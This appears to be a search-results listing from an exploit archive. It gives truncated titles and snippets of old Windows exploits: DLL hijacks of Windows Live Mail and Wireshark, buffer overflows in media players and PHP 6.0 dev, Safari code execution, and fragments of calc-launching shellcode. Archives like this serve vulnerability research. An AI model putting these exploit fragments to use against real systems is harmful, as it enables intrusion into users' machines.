395 matches found
Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking
/ Exploit Title: Windows Live Email DLL Hijacking Exploit dwmapi.dll Date: 24/08/2010 Author: Nicolas Krassas http://twitter.com/Dinosn Version: Latest windows live suite Tested on: Windows XP SP3 The code is based on the exploit from "TheLeader" Vulnerable extensions: .eml .nws .rss / include...
Wireshark 1.2.10 - airpcap.dll DLL Hijacking
Wireshark 1.2.10 - airpcap.dll DLL Hijacking / Exploit Title: Wireshark define DLLIMPORT declspec dllexport DLLIMPORT void AirpcapGetDeviceList evil; DLLIMPORT void AirpcapFreeDeviceList evil; DLLIMPORT void AirpcapOpen evil; DLLIMPORT void AirpcapClose evil; DLLIMPORT void AirpcapGetLinkType evi...
QQPlayer - .asx File Processing Buffer Overflow
QQPlayer - .asx File Processing Buffer Overflow Title: QQPlayer asx File Processing Buffer Overflow Exploit Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University Vendor: www.qq.com Platform: Windows XPSP3 Chinese Simplified Test:...
Safari JS JITed shellcode - exec calc ASLR/DEP bypass
Safari JS JITed shellcode - exec calc ASLR/DEP bypass. Shellcode exploit for windows platform var SPRAY=""; var JIT=" "+ "var y="+ "0x22222222^"+ / START OF OFFSET / "0x22222222^"+ "0x22222222^"+ "0x22222222^"+ "0x22222222^"+ /we don't wanna NULLS in pointer/ "0x22222222^"+ "0x22222222^"+...
Apple Safari 4.0.5 parent.close() Code Execution
Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command calc Local: Yes Remote: Yes POPUP must be enabled Ctrl+Shift+K Just for fun ; -- window.open"0day.htm"; //parent.close activation self.close;...
Apple Safari 4.0.5 - parent.close() Memory Corruption Code Execution
Apple Safari 4.0.5 - parent.close Memory Corruption Code Execution Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command calc Local: Yes Remote: Yes POPUP must be enabled Ctrl+Shift+K Just for fun ; -- window.open"0day.htm"; //parent.close activation self.close;...
Apple Safari 4.0.5 - 'parent.close()' Memory Corruption Code Execution
Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command calc Local: Yes Remote: Yes POPUP must be enabled Ctrl+Shift+K Just for fun ; -- window.open"0day.htm"; //parent.close activation self.close;...
AVCON 4.6.8.7 Buffer Overflow
!/usr/bin/perl Exploit Title: AVCON Buffer Overflow Date: 5/7/10 Author: Dillon Beresford URL: http://www.avcon.com.cn/ Version: 4.6.8.7 Tested on: XP SP2 and SP3 CVE : NONE Code : exploit.pl Twitter: http://twitter.com/D1N Dork: site:gov.cn "AVCON" There are other bugs... This is just for fun ;-...
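PHP str_transliterate() Function Unicode Character Remote Overflow Vulnerability
BUGTRAQ ID: 39185 PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML. A remote attacker can trigger a buffer overflow by submitting an overlong Unicode string to PHP's str_transliterate() function, leading to arbitrary code execution. Successful exploitation requires unicode.semantics to be enabled in the configuration. PHP 6.0 dev Vendor patch: PHP --- The vendor has not yet provided a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version: http://www.php.net ?php errorreporting0; PHP 6....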
PHP 6.0 Dev str_transliterate() Buffer Overflow
Exploit Title: PHP 6.0 Dev strtransliterate 0Day Buffer Overflow Exploit Date: 2010-04-04 Author: Pr0T3cT10n Software Link: http://downloads.sourceforge.net/project/wampserver/WampServer%202%20-%20Extensions/PHP/WampServer2-PHP6.0dev.exe?usemirror=garr Version: 6.0 Dev Tested on: WIN XP HEB SP3...
win32/xp pro sp3 (calc) 57 bytes
Exploit for win32 platform in category shellcode. win32/xp pro sp3 calc 57 bytes ...
CastRipper 2.9.6.0 .wvx File Local Buffer Overflow
!/usr/bin/python CastRipper 2.9.6.0 .wvx file local BOF 0day by FB1H2S Greetz to all Darkc0de, Andhra Hackers and ICW Memebers Thanks : Mr bond,beenu,Wipu,GOdwinAustin,Theempty,hgH@x0r,r45c4l,itsecurity,eberly,Tia Shoutz : SMARTHAX0R,j4ckh4x0r,41w@r10r,Hackuin Catch us at www.andhrahackers.com or...
M.J.M. Quick Player 1.2 - Local Stack Buffer Overflow
Vulnerability : M.J.M. Quick Player v1.2 Stack BOF Discovered by : mrme seeleymagicathotmaildotcom Sploit written by : corelanc0d3r corelanc0d3ratgmaildotcom Sploit released : dec 28th, 2009 Type : local and remote code execution OS : Windows Product : M.J.M. Quick Player Versions affected : 1.2...
CastRipper (Windows XP SP2) - .m3u Local Stack Buffer Overflow
CastRipper Windows XP SP2 - .m3u Local Stack Buffer Overflow //Exploit Title: CastRipper .M3U Stack BOF WinXP SP2 - C // Date: 25/12/2009 // Author: bibi-info // Version: 2.50.70 // Tested on: Windows Xp sp2 // greetz : His0k4 & All friends & muslims HaCkersdz include include include / win32exec ...
CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3
No description provided by source. !/usr/bin/perl CastRipper 2.50.70 .plsStack buffer Overflow Exploit WinXP SP3 Exploite By : d3b4g my webpage www.d3b4g.info From tiny islands of maldivies Tested on Windows XP SP3 24.12.2009 I used Adress from SHELL32.dll.You can change it to your desired...
CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3
Exploit for unknown platform in category local exploits. CastRipper 2.50.70 .pls Stack buffer Overflow Exploit WinXP SP3. Title: CastRipper 2.50.70 .pls Stack buffer...
CastRipper 2.50.70 (Windows XP SP3) - .pls Local Stack Buffer Overflow
CastRipper 2.50.70 Windows XP SP3 - .pls Local Stack Buffer Overflow !/usr/bin/perl CastRipper 2.50.70 .plsStack buffer Overflow Exploit WinXP SP3 Exploite By : d3b4g my webpage www.d3b4g.info From tiny islands of maldivies Tested on Windows XP SP3 24.12.2009 I used Adress from SHELL32.dll.You ca...
Xenorate 2.50 Local Buffer Overflow
!/usr/bin/perl =gnk [ASCII-art banner: IN THE NAME OF] Xenorate...
EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow
//executing calc scode = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" & unescape"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41" &...
SAP Player 0.9 (.m3u) Universal Local BOF Exploit (SEH)
Exploit for unknown platform in category local exploits. SAP Player 0.9 .m3u Universal Local BOF Exploit SEH. !/usr/bin/perl print qq Iranian Pentesters Home PLATEN - H.jafari - SAP playe...